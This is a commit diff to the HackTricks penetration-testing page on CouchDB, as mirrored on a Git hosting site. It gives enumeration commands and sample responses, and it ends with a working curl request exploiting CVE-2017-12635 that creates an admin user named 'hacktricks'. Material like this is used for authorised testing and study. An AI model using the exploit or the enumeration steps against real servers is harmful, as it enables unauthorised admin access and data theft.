Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2020-07-16 17:00:59 +00:00 committed by gitbook-bot
parent 28c92fde10
commit 3c305687ca
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 48 additions and 39 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

87
pentesting/5984-pentesting-couchdb.md
View file

@ -13,86 +13,95 @@ PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
```
## **Enumeration**
### **Automatic**
## **Automatic Enumeration**
```bash
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum
```
### Manual
## Manual Enumeration
### Banner
```text
curl http://IP:5984/
```
This issues a GET request to installed CouchDB instance.
The reply should look something like:
This issues a GET request to installed CouchDB instance. The reply should look something like on of the following:
```bash
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```
#### **Database List**
### **Database List**
```text
curl -X GET http://IP:5984/_all_dbs
```
If that request responds with a 401 unauthorised, then probably you would need some valid credentials to access the database:
If that request **responds with a 401 unauthorised**, then you need some **valid credentials** to access the database:
```text
curl -X GET http://user:password@IP:5984/_all_dbs
```
### \*\*\*\*[**Brute force**](../brute-force.md#couchdb)
In order to find valid Credentials you could **try to** [**bruteforce the service**](../brute-force.md#couchdb).
Once you have some **valid credentials** \(or if valid unauthenticated access\) the response to _/\_all\_dbs_ should be a list of db names like:
This is an **example** of a couchdb **response** when you have **enough privileges** to list databases \(It's just a list of dbs\):
```bash
["baseball", "plankton"]
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```
#### **Document List**
### Database Info
```text
You can obtain some database info \(like number of files and sizes\) accessing the database name:
```bash
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
```
### **Document List**
```bash
curl -X GET http://IP:5984/{dbname}/_all_docs
```
Response
```bash
{
"offset": 0,
"rows": [
{
"id": "16e458537602f5ef2a710089dffd9453",
"key": "16e458537602f5ef2a710089dffd9453",
"value": {
"rev": "1-967a00dff5e02add41819138abb3284d"
}
},
{
"id": "a4c51cdfa2069f3e905c431114001aff",
"key": "a4c51cdfa2069f3e905c431114001aff",
"value": {
"rev": "1-967a00dff5e02add41819138abb3284d"
}
},
],
"total_rows": 2
}
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
```
#### **Read Value Document**
```bash
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
```
## Local Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
Thanks to the differences between Erlang and JavaScript JSON parsers you could **create an admin user** with credentials `hacktricks:hacktricks` with the following request:
```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
```
\*\*\*\*[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
## References
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)